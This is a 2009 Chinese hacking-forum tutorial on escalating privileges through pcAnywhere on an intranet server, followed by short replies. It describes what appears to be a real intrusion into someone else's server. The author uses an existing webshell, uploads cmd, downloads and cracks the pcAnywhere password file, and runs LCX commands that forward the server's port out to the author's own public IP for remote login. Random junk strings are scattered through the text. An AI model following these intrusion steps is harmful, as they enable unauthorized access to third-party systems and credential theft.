【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [原创文章] pcanywhere之内网提权 [打印本页]

作者: huar 时间: 2009-7-5 21:35 标题: pcanywhere之内网提权

很多教程都是在外网直接连接的，像我这样的小菜没有这么好的命，我在用pcanywhere提权时问题总是多多，所以我今天做个在内网连接pcanywhere的简单教程。
% @* {3 G; x9 l# T& x( `3 G
提权方法：pcanywhere+LCX4 X& p: k0 c- t* f) g6 U8 |* Z4 S
, k' v" i, @  s5 I/ y% W
获得webshell的过程就不说了，该篇教程主要给新手讲下提权的思路。

在shell里看了下，WScript.shell等重要的组件没有被禁用，首先在有可执行读写权限的目录，上传个cmd试下可以运行。2 V! D$ z6 A" _- \/ `: R6 o
, Q  d' u. m9 R! d0 K  y! z
[attach]1548[/attach]& s6 i8 q' y/ ^/ }
查看服务器开的端口时，发现服务器开了80、1433、5631等端口，并且服务器在内网。  ~' a# m+ o1 F- Q2 N

[attach]1549[/attach]: l5 d1 c8 t6 A& [1 u
呵呵```pcanywhere的端口为5631，既然该站点有pcanywhere，我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件，下载到本地计算机上破解，呵呵```账号密码出来了。! g9 c8 \5 s+ F! i
. m( u$ S5 P# k; {% m& K1 G$ f( \
[attach]1550[/attach]- I8 D7 J, r1 ?& i

[attach]1551[/attach]
由于服务器在内网，那我们就要做端口转发，又要用到LCX啦``
2 Y, Y$ ?1 h5 `+ W# b* F
[attach]1552[/attach]7 F' Q7 \. S6 ]3 }9 r. q- E( f
LCX的用法再简单说下：) n2 P/ x7 c5 _" s2 z5 i% M! E) I

服务器上运行：lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX（服务器ip） XXXX（服务器需要转发出去的端口）

本地计算机上运行：lcx -listen XX(端口号) XXX（在自己机器上指定的端口）
( L! g' {# P% ?& v! R- o3 _9 H5 ^! z) e
由于我的机器也在内网，LCX 转发端口到本地必须用公网ip，所以我还需要在路由器上简单设置下。
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
1 N: i0 J. T5 K
[attach]1553[/attach]

[attach]1554[/attach]
呵呵``在连接的过程中出现个小问题，由于我用的是pcanyshell10.5的版本，在连接的时候提示版本过低，那我们就用12.0的版本试下。. L3 _& j1 H1 \* e
) I; X  z+ E- T3 f, f+ ?! U. Q
[attach]1555[/attach]. F# ]) K7 r% L# v" A
+ r' a% p# s/ T* y  M5 O1 O: L9 J4 E
[attach]1556[/attach]; I# }( m. `% s5 a
我们本地连接试试，输入我们刚破解的账号密码0 H. G) `* Q% k. f0 j; x

[attach]1557[/attach]8 U' r) l5 \: X$ B4 {
呵呵``连接成功,服务器不错，又一个8核^︵^

[attach]1558[/attach]

[attach]1559[/attach]

作者: 柔肠寸断 时间: 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈

作者: huar 时间: 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。

作者: gassiori 时间: 2009-7-6 09:50

八核的哟

作者: 柔肠寸断 时间: 2009-12-15 15:36

顶起。。。。。。。。。

作者: killadmin 时间: 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

欢迎光临【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)